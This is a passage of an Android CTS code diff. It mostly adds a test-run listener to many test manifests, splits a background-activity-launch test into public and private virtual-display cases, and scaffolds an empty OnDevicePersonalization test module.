import static android.app.admin.DevicePolicyManager.PERMISSION_POLICY_PROMPT;
+
import static com.android.bedstead.harrier.UserType.WORK_PROFILE;
import static com.android.bedstead.nene.utils.Versions.U;
+
import static com.google.common.truth.Truth.assertThat;
import static com.google.common.truth.Truth.assertWithMessage;
+
import static org.junit.Assume.assumeFalse;
import static org.junit.Assume.assumeTrue;
import static org.testng.Assert.assertThrows;
@@ -45,6 +48,7 @@
import android.app.admin.RemoteDevicePolicyManager;
import android.content.ComponentName;
import android.provider.Settings;
+
import com.android.bedstead.harrier.BedsteadJUnit4;
import com.android.bedstead.harrier.DeviceState;
import com.android.bedstead.harrier.annotations.AfterClass;
@@ -77,8 +81,7 @@
import com.android.bedstead.testapp.TestAppInstance;
import com.android.queryable.annotations.IntegerQuery;
import com.android.queryable.annotations.Query;
-import java.lang.annotation.Retention;
-import java.lang.annotation.RetentionPolicy;
+
import org.junit.Assume;
import org.junit.Before;
import org.junit.ClassRule;
@@ -87,6 +90,9 @@
import org.junit.Test;
import org.junit.runner.RunWith;
+import java.lang.annotation.Retention;
+import java.lang.annotation.RetentionPolicy;
+
@RunWith(BedsteadJUnit4.class)
public final class PermissionGrantTest {
diff --git a/tests/framework/base/biometrics/AndroidManifest.xml b/tests/framework/base/biometrics/AndroidManifest.xml
index f79f3d3..67a070d 100644
--- a/tests/framework/base/biometrics/AndroidManifest.xml
+++ b/tests/framework/base/biometrics/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.server.biometrics.cts"
android:label="CTS tests for Biometrics">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/framework/base/locale/AndroidManifest.xml b/tests/framework/base/locale/AndroidManifest.xml
index eeff77a..7fd1ef5 100644
--- a/tests/framework/base/locale/AndroidManifest.xml
+++ b/tests/framework/base/locale/AndroidManifest.xml
@@ -37,6 +37,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.localemanager.cts"
android:label="CTS tests for android.localemanager">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/framework/base/localeconfig/AndroidManifest.xml b/tests/framework/base/localeconfig/AndroidManifest.xml
index d931a28..6f23b37 100644
--- a/tests/framework/base/localeconfig/AndroidManifest.xml
+++ b/tests/framework/base/localeconfig/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="com.android.cts.localeconfig"
android:label="CTS tests for android.app.LocaleConfig">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/framework/base/suggestions/AndroidManifest.xml b/tests/framework/base/suggestions/AndroidManifest.xml
index 8f61c062..85e7f34 100644
--- a/tests/framework/base/suggestions/AndroidManifest.xml
+++ b/tests/framework/base/suggestions/AndroidManifest.xml
@@ -29,6 +29,8 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.service.settings.suggestions.cts"
android:label="CTS tests of android.service.settings.suggestions">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/Components.java b/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/Components.java
index 22289d8..cf59443 100644
--- a/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/Components.java
+++ b/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/Components.java
@@ -108,6 +108,12 @@
"START_ACTIVITY_FROM_FG_ACTIVITY_DELAY_MS_EXTRA";
}
+ /** Extra key constants for {@link #VIRTUAL_DISPLAY_ACTIVITY} */
+ public static class VirtualDisplayActivityExtra {
+ public final String USE_PUBLIC_PRESENTATION =
+ "USE_PUBLIC_PRESENTATION_EXTRA";
+ }
+
// TODO(b/263368846) rename to camelCase
public final String APP_PACKAGE_NAME;
public final ComponentName BACKGROUND_ACTIVITY;
@@ -138,6 +144,9 @@
public final StartActivityReceiverExtra START_ACTIVITY_RECEIVER_EXTRA =
new StartActivityReceiverExtra();
+ public final VirtualDisplayActivityExtra VIRTUAL_DISPLAY_ACTIVITY_EXTRA =
+ new VirtualDisplayActivityExtra();
+
public Components(String appPackageName) {
APP_PACKAGE_NAME = appPackageName;
diff --git a/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/VirtualDisplayActivity.java b/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/VirtualDisplayActivity.java
index 5461305..bb25cac 100644
--- a/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/VirtualDisplayActivity.java
+++ b/tests/framework/base/windowmanager/backgroundactivity/AppA/src/android/server/wm/backgroundactivity/appa/VirtualDisplayActivity.java
@@ -26,7 +26,23 @@
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
- createVirtualDisplayAndShowPresentation();
+ Components appA = Components.get(getApplicationContext());
+ boolean usePublicPresentation = getIntent().getBooleanExtra(
+ appA.VIRTUAL_DISPLAY_ACTIVITY_EXTRA.USE_PUBLIC_PRESENTATION, false);
+ if (usePublicPresentation) {
+ createPublicVirtualDisplayAndShowPresentation();
+ } else {
+ createVirtualDisplayAndShowPresentation();
+ }
+ }
+
+ private void createPublicVirtualDisplayAndShowPresentation() {
+ VirtualDisplay virtualDisplay = getSystemService(DisplayManager.class).createVirtualDisplay(
+ "VirtualDisplay1", 10, 10, 10, null,
+ DisplayManager.VIRTUAL_DISPLAY_FLAG_PUBLIC
+ + DisplayManager.VIRTUAL_DISPLAY_FLAG_PRESENTATION
+ + DisplayManager.VIRTUAL_DISPLAY_FLAG_OWN_CONTENT_ONLY);
+ new Presentation(getBaseContext(), virtualDisplay.getDisplay()).show();
}
private void createVirtualDisplayAndShowPresentation() {
diff --git a/tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java b/tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java
index a01c23d..05293de 100644
--- a/tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java
+++ b/tests/framework/base/windowmanager/backgroundactivity/src/android/server/wm/BackgroundActivityLaunchTest.java
@@ -751,10 +751,31 @@
// Check that a presentation on a virtual display won't allow BAL after pressing home.
@Test
- public void testVirtualDisplayCannotStartAfterHomeButton() throws Exception {
+ public void testPrivateVirtualDisplayCannotStartAfterHomeButton() throws Exception {
Intent intent = new Intent();
intent.setComponent(APP_A.VIRTUAL_DISPLAY_ACTIVITY);
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.putExtra(APP_A.VIRTUAL_DISPLAY_ACTIVITY_EXTRA.USE_PUBLIC_PRESENTATION, false);
+ mContext.startActivity(intent);
+
+ assertTrue("VirtualDisplay activity not started", waitUntilForegroundChanged(
+ APP_A.APP_PACKAGE_NAME, true, ACTIVITY_START_TIMEOUT_MS));
+
+ // Click home button, and test app activity onPause() will trigger which tries to launch
+ // the background activity.
+ pressHomeAndWaitHomeResumed();
+
+ boolean result = waitForActivityFocused(APP_A.BACKGROUND_ACTIVITY);
+ assertFalse("Should not able to launch background activity", result);
+ }
+
+ // Check that a presentation on a virtual display won't allow BAL after pressing home.
+ @Test
+ public void testPublicVirtualDisplayCannotStartAfterHomeButton() throws Exception {
+ Intent intent = new Intent();
+ intent.setComponent(APP_A.VIRTUAL_DISPLAY_ACTIVITY);
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ intent.putExtra(APP_A.VIRTUAL_DISPLAY_ACTIVITY_EXTRA.USE_PUBLIC_PRESENTATION, true);
mContext.startActivity(intent);
assertTrue("VirtualDisplay activity not started", waitUntilForegroundChanged(
diff --git a/tests/framework/base/windowmanager/src/android/server/wm/lifecycle/ActivityLifecycleClientTestBase.java b/tests/framework/base/windowmanager/src/android/server/wm/lifecycle/ActivityLifecycleClientTestBase.java
index 4513571..b6eea5a 100644
--- a/tests/framework/base/windowmanager/src/android/server/wm/lifecycle/ActivityLifecycleClientTestBase.java
+++ b/tests/framework/base/windowmanager/src/android/server/wm/lifecycle/ActivityLifecycleClientTestBase.java
@@ -43,7 +43,6 @@
import android.content.Context;
import android.content.Intent;
import android.content.pm.ActivityInfo;
-import android.graphics.Rect;
import android.os.Bundle;
import android.server.wm.MultiDisplayTestBase;
import android.server.wm.ObjectTracker;
@@ -623,18 +622,6 @@
Activity secondaryActivity) throws Exception {
getTransitionLog().clear();
- final int screenwidth = mWm.getDefaultDisplay().getWidth();
- final int screenheight = mWm.getDefaultDisplay().getHeight();
-
- mTaskOrganizer.registerOrganizerIfNeeded();
- Rect primaryTaskBounds = mTaskOrganizer.getPrimaryTaskBounds();
- if (screenheight > screenwidth) {
- primaryTaskBounds.bottom = primaryTaskBounds.width() / 2;
- } else {
- primaryTaskBounds.right = primaryTaskBounds.height() / 2;
- }
- mTaskOrganizer.setRootPrimaryTaskBounds(primaryTaskBounds);
-
mWmState.computeState(secondaryActivity.getComponentName());
moveActivitiesToSplitScreen(primaryActivity.getComponentName(),
secondaryActivity.getComponentName());
diff --git a/tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java b/tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java
index eb895ea..f04284c 100644
--- a/tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java
+++ b/tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java
@@ -305,7 +305,7 @@
}
}
- public void setRootPrimaryTaskBounds(Rect bounds) {
+ void setRootPrimaryTaskBounds(Rect bounds) {
setTaskBounds(mRootPrimary.getToken(), bounds);
}
diff --git a/tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java b/tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java
index 913b039..b2a8520 100644
--- a/tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java
+++ b/tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java
@@ -379,9 +379,10 @@
}, message);
}
- public void waitForFocusedActivity(final String msg, final ComponentName activityName) {
+ public boolean waitForFocusedActivity(final String msg, final ComponentName activityName) {
final String activityComponentName = getActivityName(activityName);
- waitFor(msg, wmState -> Objects.equals(activityComponentName, wmState.getFocusedActivity())
+ return waitFor(msg, wmState ->
+ Objects.equals(activityComponentName, wmState.getFocusedActivity())
&& Objects.equals(activityComponentName, wmState.getFocusedApp()));
}
diff --git a/tests/inputmethod/AndroidManifest.xml b/tests/inputmethod/AndroidManifest.xml
index 1687d15..4d83f06 100644
--- a/tests/inputmethod/AndroidManifest.xml
+++ b/tests/inputmethod/AndroidManifest.xml
@@ -74,6 +74,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests of android.view.inputmethod"
android:targetPackage="android.view.inputmethod.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/leanbackjank/AndroidManifest.xml b/tests/leanbackjank/AndroidManifest.xml
index 560b5ca..2b1f1a6 100644
--- a/tests/leanbackjank/AndroidManifest.xml
+++ b/tests/leanbackjank/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.leanbackjank.cts"
android:label="LeanbackJank tests">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/location/location_coarse/AndroidManifest.xml b/tests/location/location_coarse/AndroidManifest.xml
index dc55f8e6..1707b11 100644
--- a/tests/location/location_coarse/AndroidManifest.xml
+++ b/tests/location/location_coarse/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for android.location"
android:targetPackage="android.location.cts.coarse" >
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/location/location_fine/AndroidManifest.xml b/tests/location/location_fine/AndroidManifest.xml
index ec33245..093c0fa 100644
--- a/tests/location/location_fine/AndroidManifest.xml
+++ b/tests/location/location_fine/AndroidManifest.xml
@@ -37,6 +37,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.location.cts.fine"
android:label="CTS tests for android.location">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/location/location_gnss/AndroidManifest.xml b/tests/location/location_gnss/AndroidManifest.xml
index c83b49c..49f1368 100644
--- a/tests/location/location_gnss/AndroidManifest.xml
+++ b/tests/location/location_gnss/AndroidManifest.xml
@@ -39,6 +39,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for android.location that require GNSS signal"
android:targetPackage="android.location.cts.gnss" >
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/location/location_none/AndroidManifest.xml b/tests/location/location_none/AndroidManifest.xml
index 75dfa93..957aeeb 100644
--- a/tests/location/location_none/AndroidManifest.xml
+++ b/tests/location/location_none/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for android.location"
android:targetPackage="android.location.cts.none" >
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/location/location_privileged/AndroidManifest.xml b/tests/location/location_privileged/AndroidManifest.xml
index c5c71bf..a0200fa 100644
--- a/tests/location/location_privileged/AndroidManifest.xml
+++ b/tests/location/location_privileged/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS tests for android.location"
android:targetPackage="android.location.cts.privileged" >
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/media/AndroidManifest.xml b/tests/media/AndroidManifest.xml
index 711f1c3..0a1f5e0 100644
--- a/tests/media/AndroidManifest.xml
+++ b/tests/media/AndroidManifest.xml
@@ -36,6 +36,9 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.mediav2.cts"
android:label="CTS MediaV2 tests of android.media" >
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/mediapc/AndroidManifest.xml b/tests/mediapc/AndroidManifest.xml
index 5a045d8..bbb1934 100644
--- a/tests/mediapc/AndroidManifest.xml
+++ b/tests/mediapc/AndroidManifest.xml
@@ -37,5 +37,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.mediapc.cts"
android:label="CTS MediaPerformanceClass tests of android.media" >
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/mocking/AndroidManifest.xml b/tests/mocking/AndroidManifest.xml
index c1736fc..d0f9e00 100644
--- a/tests/mocking/AndroidManifest.xml
+++ b/tests/mocking/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.mocking.cts"
android:label="CTS tests for mockito mocking">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/mocking/debuggable/AndroidManifest.xml b/tests/mocking/debuggable/AndroidManifest.xml
index cca80f5..3ca5af9 100644
--- a/tests/mocking/debuggable/AndroidManifest.xml
+++ b/tests/mocking/debuggable/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.mocking.cts.debuggable"
android:label="CTS tests for mockito mocking (while debuggable)">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/mocking/extended/AndroidManifest.xml b/tests/mocking/extended/AndroidManifest.xml
index a50e23a..36bd152 100644
--- a/tests/mocking/extended/AndroidManifest.xml
+++ b/tests/mocking/extended/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.extended.mocking.cts"
android:label="CTS tests for mockito extended mocking">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/mocking/inline/AndroidManifest.xml b/tests/mocking/inline/AndroidManifest.xml
index b5b2d08..4bb4085 100644
--- a/tests/mocking/inline/AndroidManifest.xml
+++ b/tests/mocking/inline/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.inline.mocking.cts"
android:label="CTS tests for mockito inline mocking">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/ondevicepersonalization/Android.bp b/tests/ondevicepersonalization/Android.bp
new file mode 100644
index 0000000..738effe
--- /dev/null
+++ b/tests/ondevicepersonalization/Android.bp
@@ -0,0 +1,44 @@
+// Copyright (C) 2022 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test {
+ name: "CtsOnDevicePersonalizationTestCases",
+ defaults: [
+ "cts_defaults",
+ "framework-ondevicepersonalization-cts-defaults",
+ ],
+ // Tag this module as a cts test artifact
+ test_suites: [
+ "cts",
+ "general-tests",
+ "mts-ondevicepersonalization",
+ ],
+ libs: [
+ "android.test.runner",
+ ],
+ static_libs: [
+ "androidx.test.ext.junit",
+ "ctstestrunner-axt",
+ "compatibility-device-util-axt",
+ "mockito-target-minus-junit4",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ platform_apis: false,
+}
diff --git a/tests/ondevicepersonalization/AndroidManifest.xml b/tests/ondevicepersonalization/AndroidManifest.xml
new file mode 100644
index 0000000..8016e92
--- /dev/null
+++ b/tests/ondevicepersonalization/AndroidManifest.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.ondevicepersonalization.cts">
+
+ <!-- self-instrumenting test package. -->
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:label="CTS tests for android.ondevicepersonalization"
+ android:targetPackage="android.ondevicepersonalization.cts" >
+ </instrumentation>
+</manifest>
diff --git a/tests/ondevicepersonalization/AndroidTest.xml b/tests/ondevicepersonalization/AndroidTest.xml
new file mode 100644
index 0000000..1ca3ae6
--- /dev/null
+++ b/tests/ondevicepersonalization/AndroidTest.xml
@@ -0,0 +1,37 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<configuration description="Config for CTS OnDevicePersonalization test cases">
+ <option name="test-suite-tag" value="cts" />
+ <option name="config-descriptor:metadata" key="component" value="framework" />
+ <option name="config-descriptor:metadata" key="parameter" value="instant_app" />
+ <option name="config-descriptor:metadata" key="parameter" value="not_multi_abi" />
+ <option name="config-descriptor:metadata" key="parameter" value="secondary_user" />
+ <option name="config-descriptor:metadata" key="mainline-param" value="com.google.android.ondevicepersonalization.apex" />
+
+ <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
+ <option name="cleanup-apks" value="true" />
+ <option name="test-file-name" value="CtsOnDevicePersonalizationTestCases.apk" />
+ </target_preparer>
+
+ <test class="com.android.tradefed.testtype.AndroidJUnitTest" >
+ <option name="package" value="android.ondevicepersonalization.cts" />
+ <option name="hidden-api-checks" value="false" />
+ </test>
+
+ <object type="module_controller" class="com.android.tradefed.testtype.suite.module.MainlineTestModuleController">
+ <option name="mainline-module-package-name" value="com.google.android.ondevicepersonalization" />
+ </object>
+</configuration>
\ No newline at end of file
diff --git a/tests/ondevicepersonalization/OWNERS b/tests/ondevicepersonalization/OWNERS
new file mode 100644
index 0000000..57cdbaf
--- /dev/null
+++ b/tests/ondevicepersonalization/OWNERS
@@ -0,0 +1,2 @@
+# Bug component: 1117807
+include platform/packages/modules/OnDevicePersonalization:/OWNERS
\ No newline at end of file
diff --git a/tests/ondevicepersonalization/TEST_MAPPING b/tests/ondevicepersonalization/TEST_MAPPING
new file mode 100644
index 0000000..8d96b25
--- /dev/null
+++ b/tests/ondevicepersonalization/TEST_MAPPING
@@ -0,0 +1,7 @@
+{
+ "presubmit": [
+ {
+ "name": "CtsOnDevicePersonalizationTestCases"
+ }
+ ]
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/ondevicepersonalization/src/android/ondevicepersonalization/cts/OnDevicePersonalizationServiceTest.java
similarity index 65%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/ondevicepersonalization/src/android/ondevicepersonalization/cts/OnDevicePersonalizationServiceTest.java
index 4416990..c82e039 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/ondevicepersonalization/src/android/ondevicepersonalization/cts/OnDevicePersonalizationServiceTest.java
@@ -14,9 +14,17 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.ondevicepersonalization.cts;
-import android.app.Activity;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import org.junit.runners.JUnit4;
-public class PocActivity extends Activity {
+/**
+ * Test of {@link OnDevicePersonalizationManager}
+ */
+@RunWith(JUnit4.class)
+public class OnDevicePersonalizationServiceTest {
+ @Test
+ public void test() throws Exception {}
}
diff --git a/tests/pdf/AndroidManifest.xml b/tests/pdf/AndroidManifest.xml
index 6010dbc..2d65f1c 100644
--- a/tests/pdf/AndroidManifest.xml
+++ b/tests/pdf/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.graphics.pdf.cts"
android:label="CTS tests of android.graphics.pdf">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/providerui/AndroidManifest.xml b/tests/providerui/AndroidManifest.xml
index 711ab0e..a14df70 100644
--- a/tests/providerui/AndroidManifest.xml
+++ b/tests/providerui/AndroidManifest.xml
@@ -56,6 +56,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.providerui.cts"
android:label="CTS UI tests of android.provider">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/sensor/AndroidManifest.xml b/tests/sensor/AndroidManifest.xml
index 1cce32d..e693c87 100644
--- a/tests/sensor/AndroidManifest.xml
+++ b/tests/sensor/AndroidManifest.xml
@@ -34,6 +34,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.hardware.sensor.cts"
android:label="CTS sensor tests">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/accounts/AndroidManifest.xml b/tests/tests/accounts/AndroidManifest.xml
index acf78ad..999a3c6 100644
--- a/tests/tests/accounts/AndroidManifest.xml
+++ b/tests/tests/accounts/AndroidManifest.xml
@@ -69,6 +69,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.accounts.cts"
android:label="CTS tests for android.accounts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/activityrecognition/AndroidManifest.xml b/tests/tests/activityrecognition/AndroidManifest.xml
index c251d6c..5fb7c8f 100644
--- a/tests/tests/activityrecognition/AndroidManifest.xml
+++ b/tests/tests/activityrecognition/AndroidManifest.xml
@@ -39,6 +39,9 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.activityrecognition.cts"
android:label="CTS activity recognition tests">
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/animation/AndroidManifest.xml b/tests/tests/animation/AndroidManifest.xml
index 73f264f..6e8704e 100644
--- a/tests/tests/animation/AndroidManifest.xml
+++ b/tests/tests/animation/AndroidManifest.xml
@@ -31,6 +31,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.animation.cts"
android:label="CTS tests for android.animation package">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/app.usage/AndroidManifest.xml b/tests/tests/app.usage/AndroidManifest.xml
index bc64736..3744b05 100644
--- a/tests/tests/app.usage/AndroidManifest.xml
+++ b/tests/tests/app.usage/AndroidManifest.xml
@@ -79,6 +79,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.usage.cts"
android:label="CTS tests of android.app.usage">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/app/AndroidManifest.xml b/tests/tests/app/AndroidManifest.xml
index f888da4..e46d311 100644
--- a/tests/tests/app/AndroidManifest.xml
+++ b/tests/tests/app/AndroidManifest.xml
@@ -43,6 +43,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.cts"
android:label="CTS tests of android.app">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/appcomponentfactory/AndroidManifest.xml b/tests/tests/appcomponentfactory/AndroidManifest.xml
index e6f3c99..d943327 100644
--- a/tests/tests/appcomponentfactory/AndroidManifest.xml
+++ b/tests/tests/appcomponentfactory/AndroidManifest.xml
@@ -34,6 +34,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.componentfactory.cts"
android:label="CTS tests of android.app">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/appenumeration/AndroidManifest.xml b/tests/tests/appenumeration/AndroidManifest.xml
index 3a631e3..8e9d618 100644
--- a/tests/tests/appenumeration/AndroidManifest.xml
+++ b/tests/tests/appenumeration/AndroidManifest.xml
@@ -51,6 +51,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.appenumeration.cts"
android:label="CTS tests for app enumeration">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/appop/src/android/app/appops/cts/AppOpsLoggingTest.kt b/tests/tests/appop/src/android/app/appops/cts/AppOpsLoggingTest.kt
index 4db7ea0..97610fa 100644
--- a/tests/tests/appop/src/android/app/appops/cts/AppOpsLoggingTest.kt
+++ b/tests/tests/appop/src/android/app/appops/cts/AppOpsLoggingTest.kt
@@ -969,7 +969,7 @@
fun checkAttributionsAreUserVisible() {
val pi = context.packageManager.getPackageInfo(
TEST_SERVICE_PKG, PackageManager.PackageInfoFlags.of(GET_ATTRIBUTIONS_LONG))
- assertThat(pi.applicationInfo.areAttributionsUserVisible())
+ assertThat(pi.applicationInfo?.areAttributionsUserVisible()).isTrue()
}
@After
diff --git a/tests/tests/appwidget/Android.bp b/tests/tests/appwidget/Android.bp
index 9fc1a0d..89b1e10 100644
--- a/tests/tests/appwidget/Android.bp
+++ b/tests/tests/appwidget/Android.bp
@@ -37,6 +37,7 @@
"ctstestrunner-axt",
"junit",
